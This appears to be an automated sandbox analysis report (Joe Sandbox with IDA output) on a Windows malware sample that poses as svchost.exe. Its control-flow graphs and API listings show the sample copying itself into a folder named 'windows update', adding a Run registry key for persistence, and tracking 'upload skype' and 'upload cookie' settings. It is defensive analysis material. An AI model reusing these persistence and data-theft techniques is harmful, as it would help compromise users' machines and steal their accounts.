??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 2004->2006 2007 673249 2004->2007 2005->2004 2005->2005 2018 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2006->2018 2009 673250 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2007->2009 2009->2006 2009->2009 2010 6732b7 7 API calls 2010->1995 2010->1996 2011->1951 2012->1951 2013->1964 2014->1978 2015->1986 2016->1994 2017->2003 2018->2010 2019->1993 2022 671180 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2023 6711d5 2022->2023 2024 671209 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2023->2024 2025 673780 DestroyWindow 2032 67529e 2033 6752da 2032->2033 2035 6752b0 2032->2035 2034 6752d5 ?terminate@ 2034->2033 2035->2033 2035->2034 2040 673398 2041 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2040->2041 2041->2041 2042 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 2041->2042 2049 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2042->2049 2044 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 2045 673432 8 API calls 2044->2045 2046 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2044->2046 2045->2046 2047 674bfc 7 API calls 2046->2047 2048 673557 2047->2048 2049->2044

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 671480-6714d4 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 1 671a56-671a73 call 674bfc 0->1 2 6714da-671533 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 6712b0 0->2 7 671535-671558 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 2->7 8 67155a-67159b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 2->8 7->7 7->8 9 6715c7-6715cd 8->9 10 67159d 8->10 12 6715f5-671636 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 9->12 13 6715cf 9->13 11 6715a0-6715c5 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 10->11 11->9 11->11 15 67165f-671665 12->15 16 671638-67165d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 12->16 14 6715d0-6715f3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 13->14 14->12 14->14 17 671667 15->17 18 671695-6716d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 15->18 16->15 16->16 19 671670-671693 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 17->19 20 6716d6-6716fb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 18->20 21 6716fd-671703 18->21 19->18 19->19 20->20 20->21 22 671705-671728 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 21->22 23 67172a-671769 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 21->23 22->22 22->23 24 671797-67179d 23->24 25 67176b 23->25 27 6717c5-671806 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 24->27 28 67179f 24->28 26 671770-671795 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 25->26 26->24 26->26 30 67182f-671835 27->30 31 671808-67182d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 27->31 29 6717a0-6717c3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 28->29 29->27 29->29 32 671837 30->32 33 671865-6718a4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 30->33 31->30 31->31 34 671840-671863 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 32->34 35 6718a6-6718cb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 33->35 36 6718cd-6718d3 33->36 34->33 34->34 35->35 35->36 37 6718d5-6718f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 36->37 38 6718fa-67193b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 36->38 37->37 37->38 39 671967-67196d 38->39 40 67193d 38->40 41 671995-6719dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 39->41 42 67196f 39->42 43 671940-671965 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 40->43 45 671a07-671a0d 41->45 46 6719de 41->46 44 671970-671993 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 42->44 43->39 43->43 44->41 44->44 48 671a35-671a50 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 45->48 49 671a0f 45->49 47 6719e0-671a05 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 46->47 47->45 47->47 48->1 50 671a10-671a33 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 49->50 50->48 50->50
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C,AED9119B,6D4EE41E,?), ref: 006714BD
      • fopen.MSVCR90 ref: 006714C4
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006714DE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 006714F5
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,nnumber=%d,FFFFFFFF), ref: 0067150C
      • sprintf.MSVCR90 ref: 00671519
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00671527,?,?, ), ref: 006712B7
        • Part of subcall function 006712B0: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?, ), ref: 006712CB
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?, ), ref: 006712D8
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?, ), ref: 0067153A
      • fputc.MSVCR90 ref: 0067154E
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?, ), ref: 00671563
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload skype=%d,00000000,?,?, ), ref: 0067157C
      • sprintf.MSVCR90 ref: 00671583
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671592
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006715AC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006715BC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006715D5
      • fputc.MSVCR90 ref: 006715E9
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 006715FE
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload cookie=%d,00000000), ref: 00671617
      • sprintf.MSVCR90 ref: 0067161E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067162D
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00671644
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671654
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671675
      • fputc.MSVCR90 ref: 00671689
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??4?$basic_string@?erase@?$basic_string@V01@V12@fputcsprintf$??0?$basic_string@fopen
      • String ID: $just reinstall=%d$nnumber=%d$reg path s=%s$starts=%d$sub=%d$tics=%d$upload cookie=%d$upload skype=%d$version=%d
      • API String ID: 3813119273-1331763688
      • Opcode ID: 114550444df9eeb68e8e461f43b8b6b1785afe85e31e5c087768154964f771b5
      • Instruction ID: 29b50c465d9bfa04c61de21cac1eaea052620051508cabb7ab56165b38578138
      • Opcode Fuzzy Hash: 114550444df9eeb68e8e461f43b8b6b1785afe85e31e5c087768154964f771b5
      • Instruction Fuzzy Hash: 18029E71508701AFD708DF24ED99AAAB7B6FB85701F00951DF48E971A1DB309E88CF62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 51 674500-6746ba GetLocalTime ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 671260 * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateDirectoryA ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 58 674707-67472a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z 51->58 59 6746bc-6746fd RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z RegSetValueExA RegCloseKey call 671480 51->59 61 674730-674744 fgetc 58->61 62 674702 59->62 63 674993-67499c ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z 61->63 64 67474a-674787 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 61->64 66 6749d7-674a2f call 671480 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 674bfc 62->66 65 6749a2-6749b0 feof 63->65 72 6747af-6747c2 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 64->72 73 674789-6747aa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 64->73 65->61 68 6749b6-6749d1 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 65->68 68->66 74 6747e5-6747f8 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 72->74 75 6747c4-6747e0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 72->75 73->72 80 67481b-67482e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 74->80 81 6747fa-674816 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 74->81 75->74 85 674851-674864 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 80->85 86 674830-67484c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 673560 80->86 81->80 89 674887-67489a ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 85->89 90 674866-674882 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 673560 85->90 86->85 91 6748bd-6748d0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 89->91 92 67489c-6748b8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 89->92 90->89 97 6748f3-674906 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 91->97 98 6748d2-6748ee ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 91->98 92->91 101 674929-67493c ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 97->101 102 674908-674924 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 673560 97->102 98->97 105 674982-674991 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 101->105 106 67493e-67497c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6735f0 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 101->106 102->101 105->65 106->105
      APIs
      • GetLocalTime.KERNEL32(0067844C,AED9119B,?,?), ref: 0067453F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,?,?), ref: 0067454E
      • GetUserNameA.ADVAPI32(?), ref: 00674574
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update,?), ref: 0067458D
      • sprintf.MSVCR90 ref: 0067459A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676B34,?,?,?), ref: 006745B3
      • sprintf.MSVCR90 ref: 006745BA
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 006745DB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 006745EF
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s\svchost.exe",00000000), ref: 00674601
      • sprintf.MSVCR90 ref: 00674608
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,?,?,00000000), ref: 0067461E
      • CreateDirectoryA.KERNELBASE(00000000,?,?,00000000), ref: 00674625
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,\status_f.txt,?,?,00000000), ref: 0067463A
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 00674651
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00674663
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00674673
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\config), ref: 00674682
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00674692
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C), ref: 006746A3
      • fopen.MSVCR90 ref: 006746AA
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 006746CB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070,?,00000000), ref: 006746D7
      • RegSetValueExA.KERNELBASE(?,windows update,00000000,00000001,00000000,?,00000000), ref: 006746EC
      • RegCloseKey.KERNELBASE(?,?,00000000), ref: 006746F7
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C,AED9119B,6D4EE41E,?), ref: 006714BD
        • Part of subcall function 00671480: fopen.MSVCR90 ref: 006714C4
        • Part of subcall function 00671480: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006714DE
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 006714F5
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,nnumber=%d,FFFFFFFF), ref: 0067150C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671519
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?, ), ref: 0067153A
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 0067154E
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?, ), ref: 00671563
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload skype=%d,00000000,?,?, ), ref: 0067157C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671583
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671592
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006715AC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006715BC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006715D5
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 006715E9
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 006715FE
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload cookie=%d,00000000), ref: 00671617
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 0067161E
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067162D
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00671644
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671654
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671675
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 00671689
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067169E
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,tics=%d,?), ref: 006716B5
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 006716BC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716CB
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006716E2
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716F2
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 0067170A
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(00676226,?,00000000), ref: 00674710
      • fgetc.MSVCR90 ref: 00674737
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001,?,?,00000000), ref: 00674752
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00674766
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(sub,00000000), ref: 0067477F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00674797
